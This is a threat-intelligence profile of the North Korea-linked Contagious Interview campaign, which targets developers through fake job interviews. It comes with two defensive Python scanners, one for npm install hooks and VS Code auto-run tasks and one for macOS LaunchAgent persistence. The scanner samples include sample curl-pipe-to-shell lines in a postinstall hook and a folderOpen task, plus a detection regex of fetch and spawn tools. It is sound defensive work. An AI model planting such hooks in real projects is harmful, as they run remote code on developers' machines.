Contagious Interview (DPRK)
DPRK (North Korea) is the state sponsor behind several campaigns and malware families covered here, including Contagious Interview, React2Shell activity, and related DPRK-aligned operations. Reporting refers to the operators as Contagious Interview or simply as DPRK-aligned operators.
Contagious Interview is an ongoing DPRK-linked campaign that targets software developers, particularly job-seeking blockchain and Web3 engineers, through fake job interviews, staged hiring tasks, and trojanized meeting or assessment applications. Victims are instructed to run commands, or to install packages and applications, that are malicious. The campaign has used more than 197 malicious npm packages with more than 31,000 downloads since October 10, and has relied on GitHub and Vercel infrastructure for payload delivery and command and control.
Malware associated with this activity includes OtterCookie, a multistage infostealer and RAT, and BeaverTail, a downloader and stealer delivered via trojanized meeting apps and fake recruitment lures. Reported capabilities include theft of credentials, cryptocurrency wallet data, clipboard contents, browser data, keystrokes, and screenshots.
FlexibleFerret is also attributed to DPRK-aligned operators as part of the Contagious Interview operation. It is a macOS malware family distributed through fake recruitment sites such as evaluza[.]com and proficiencycert[.]com. Victims are socially engineered into running Terminal commands that start a multi-stage infection chain: JavaScript stagers, shell scripts, architecture-specific payloads, persistence via a LaunchAgent, and a Go-based backdoor. Reported capabilities include credential theft, file exfiltration, OS command execution, and exfiltration through the Dropbox API.
This activity targets macOS users, especially online job seekers, and is an evolution of earlier Contagious Interview tradecraft. Other DPRK-linked malware and operations in the reporting include EtherRAT, a novel Ethereum implant used in React2Shell attacks, and SpectralBlur, a DPRK malware family analyzed in 2024. One campaign also abused Microsoft VS Code tasks to deliver Contagious Interview malware. Taken together, the material portrays DPRK as a persistent nation-state actor combining social engineering, software supply chain compromise, fake recruitment workflows, and multi-stage malware delivery against developers and other targets of strategic interest.
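Two of the lures above hinge on something the target runs inside a project the attacker controls: `npm install` executes the lifecycle scripts of the package and of every dependency, and VS Code starts tasks marked `runOn: folderOpen` once the workspace is trusted. The script below is an added example, not code from the reporting, from npm or from Microsoft. It is a pre-flight scan for a take-home assignment: it lists install-time hooks in every package.json and auto-run tasks in .vscode/tasks.json (a JSONC file, so comments and trailing commas are stripped before parsing). The suspicious-pattern regex is the author's assumption rather than a published indicator, and both sample files are constructed for the example.

```python
"""Pre-flight scan of a take-home assignment before `npm install` or opening it in VS Code.
Added example, not code from the reporting, npm or Microsoft. The SUSPICIOUS_SCRIPT
patterns are the author's assumption about what a second-stage fetch looks like."""
import json
import os
import re
from typing import Dict, List

# npm runs these hooks automatically during `npm install` (documented lifecycle events).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Assumed: shapes of a script that fetches, decodes or spawns a second stage.
SUSPICIOUS_SCRIPT = re.compile(
    r"(curl|wget|Invoke-WebRequest|node\s+-e|eval\(|base64|atob\(|child_process"
    r"|https?://\S+|\|\s*(sh|bash)\b)",
    re.IGNORECASE,
)

def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside strings, then trailing commas, so json.loads accepts
    VS Code's JSONC. The trailing-comma pass is a regex; it assumes no string contains ',}' or ',]'."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        ch = text[i]
        if in_str:
            out.append(ch)
            if ch == "\\" and i + 1 < n:      # keep the escaped char, e.g. \" inside a string
                out.append(text[i + 1])
                i += 1
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            out.append(ch)
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = (n if j < 0 else j) - 1       # leave the newline for the main loop
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = (n if j < 0 else j + 2) - 1
        else:
            out.append(ch)
        i += 1
    return re.sub(r",\s*([}\]])", r"\1", "".join(out))

def _flag(cmd: str) -> str:
    return "SUSPICIOUS" if SUSPICIOUS_SCRIPT.search(cmd) else "review"

def scan_package_json(text: str) -> List[str]:
    """Findings for scripts npm would execute while installing this package."""
    try:
        pkg = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"package.json unparsable: {exc.msg}"]
    scripts = (pkg.get("scripts") if isinstance(pkg, dict) else None) or {}
    return [f"{_flag(scripts[h])}: {h} runs on install: {scripts[h]}"
            for h in INSTALL_HOOKS if isinstance(scripts.get(h), str)]

def scan_vscode_tasks(text: str) -> List[str]:
    """Findings for tasks.json entries VS Code starts automatically when the folder is opened."""
    try:
        doc = json.loads(strip_jsonc(text))
    except json.JSONDecodeError as exc:
        return [f"tasks.json unparsable: {exc.msg}"]
    findings = []
    for task in (doc.get("tasks") if isinstance(doc, dict) else None) or []:
        if not isinstance(task, dict) or (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args") or []])
        findings.append(f"{_flag(cmd)}: task {task.get('label', '?')!r} auto-runs on folderOpen: {cmd}")
    return findings

def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a checkout (node_modules included, after `npm install --ignore-scripts`) and scan
    every package.json and .vscode/tasks.json; returns {path: findings} for files with hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name == "package.json":
                scanner = scan_package_json
            elif name == "tasks.json" and os.path.basename(dirpath) == ".vscode":
                scanner = scan_vscode_tasks
            else:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scanner(fh.read())
            if hits:
                report[path] = hits
    return report

# Constructed sample manifest: a postinstall hook that spawns a download (not a real package).
SAMPLE_PACKAGE_JSON = """{
  "name": "assessment-task", "version": "1.0.0",
  "scripts": {
    "test": "jest",
    "postinstall": "node -e \\"require('child_process').exec('curl -s https://example.invalid/s | sh')\\""
  }
}"""
# Constructed sample tasks.json with JSONC comments and a trailing comma (not a real IOC).
SAMPLE_TASKS_JSON = """{
  // See https://go.microsoft.com/fwlink/?LinkId=733558 for the documentation
  "version": "2.0.0",
  "tasks": [
    { "label": "setup", "type": "shell", "command": "bash",
      "args": ["-c", "curl -fsSL https://example.invalid/setup.sh | bash"],
      "runOptions": { "runOn": "folderOpen" }, /* fires when the folder is opened */
    },
    { "label": "build", "type": "shell", "command": "npm run build" }
  ]
}"""

if __name__ == "__main__":
    print(scan_package_json(SAMPLE_PACKAGE_JSON))
    print(scan_vscode_tasks(SAMPLE_TASKS_JSON))
    # Real use: print(scan_tree("/path/to/cloned-assignment"))
```

Clone the assignment, run `npm install --ignore-scripts` so nothing executes, then point `scan_tree` at the checkout so the package.json of every dependency is covered, not just the top-level manifest. `--ignore-scripts` also skips legitimate build steps such as `prepare`, so review the flagged hooks before re-running the install without it. For VS Code, the practical control is Workspace Trust: do not trust a recruiter's repository until tasks.json has been read.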
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- technology
- blockchain
- crypto
Tradecraft
15 distinct MITRE ATT&CK techniques observed across reporting, grouped by tactic.
Associated vulnerabilities
1 CVE used by this actor in observed campaigns, and it has been exploited in the wild.
Recent activity
4 sources tracked across advisories, community write-ups, and news.
DPRK is using a novel Ethereum implant called EtherRAT in attacks leveraging the React2Shell vulnerability.
The Contagious Interview campaign is a North Korean state-sponsored operation targeting software developers, especially in the blockchain and Web3 sectors, through fake job interviews and test assignments. The attackers use social engineering to lure victims and then deliver malicious npm packages to compromise developer environments, steal credentials, cryptocurrency, and other sensitive data, and establish persistent access for further exploitation.
DPRK-aligned operators conduct credential theft and espionage campaigns against individuals, using fake job recruitment lures to socially engineer targets into executing macOS malware (FlexibleFerret), which establishes persistence, exfiltrates credentials, and provides remote access.
DPRK-linked threat actors have developed stealer malware such as BeaverTail, distributed via trojanized meeting applications, targeting users for credential and data theft.
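The FlexibleFerret entry above names LaunchAgent persistence, which is the one step of that infection chain a defender can audit cheaply on an endpoint. The following is an added example, not code from the reporting or from any vendor tool: it parses LaunchAgent plists with Python's standard plistlib and flags traits common to user-level persistence. The suspicious directories, interpreter names and reverse-DNS label rule are the author's assumptions, and the two plists are constructed samples, not indicators from the campaign.

```python
"""Audit macOS LaunchAgent plists for traits typical of user-level persistence.
Added example, not code from the reporting. SUSPICIOUS_DIRS, SUSPICIOUS_BINS and
LABEL_RE are the author's assumed heuristics, not published indicators."""
import os
import plistlib
import re
from typing import Dict, List

# Assumed: places a payload dropped by a pasted Terminal one-liner tends to live.
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Library/Caches/", "/.cache/")
# Assumed: interpreters and fetchers a stager typically hands control to.
SUSPICIOUS_BINS = {"sh", "bash", "zsh", "node", "osascript", "curl", "python", "python3", "nohup"}
# Vendor agents conventionally use reverse-DNS labels such as com.vendor.product.
LABEL_RE = re.compile(r"[A-Za-z0-9-]+(\.[A-Za-z0-9_-]+){2,}")

def parse_launch_agent(data: bytes) -> Dict:
    """Parse an XML or binary plist; return {} if it is malformed or not a dictionary."""
    try:
        obj = plistlib.loads(data)
    except Exception:
        return {}
    return obj if isinstance(obj, dict) else {}

def command_line(plist: Dict) -> List[str]:
    """Flatten Program and ProgramArguments into one argv-style list."""
    argv = []
    if isinstance(plist.get("Program"), str):
        argv.append(plist["Program"])
    if isinstance(plist.get("ProgramArguments"), list):
        argv.extend(str(a) for a in plist["ProgramArguments"])
    return argv

def score_agent(plist: Dict) -> List[str]:
    """Return reasons this agent deserves review; an empty list means nothing stood out."""
    argv = command_line(plist)
    if not argv:
        return ["no Program/ProgramArguments (malformed or unparsable plist)"]
    reasons = []
    joined = " ".join(argv)
    if any(d in arg for arg in argv for d in SUSPICIOUS_DIRS):
        reasons.append("executes from a temp/cache directory")
    exe = os.path.basename(argv[0])
    if exe in SUSPICIOUS_BINS:
        reasons.append(f"launches interpreter/fetcher {exe}")
    if re.search(r"(?:^|\s)-[ce]\s", joined) or re.search(r"\bcurl\b.*\|", joined):
        reasons.append("inline script or piped download in arguments")
    if plist.get("RunAtLoad") is True and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive (restarts whenever it exits)")
    label = str(plist.get("Label", ""))
    if not LABEL_RE.fullmatch(label):
        reasons.append(f"Label {label!r} is not reverse-DNS style")
    return reasons

def audit_directory(path: str) -> Dict[str, List[str]]:
    """Score every .plist in a LaunchAgents directory; returns {filename: reasons} for hits only."""
    findings = {}
    if not os.path.isdir(path):
        return findings
    for name in sorted(os.listdir(path)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            reasons = score_agent(parse_launch_agent(fh.read()))
        if reasons:
            findings[name] = reasons
    return findings

# Constructed sample shaped like a persistence plist a stager might write (not a real IOC).
SAMPLE_SUSPICIOUS = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>update</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
<string>/private/tmp/.u/run.sh</string></array>
<key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>"""
# Constructed sample of an ordinary vendor updater agent, for contrast.
SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array><string>/Applications/Example.app/Contents/MacOS/updater</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, blob in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, score_agent(parse_launch_agent(blob)))
    # Real use: print(audit_directory(os.path.expanduser("~/Library/LaunchAgents")))
```

Run `audit_directory` against `~/Library/LaunchAgents` for each user and `/Library/LaunchAgents` for system-wide agents. A hit is a lead, not a verdict: plenty of legitimate helpers run shell scripts at login, so confirm the flagged ProgramArguments path, check whether the referenced file still exists on disk, and look at what it does before removing the agent.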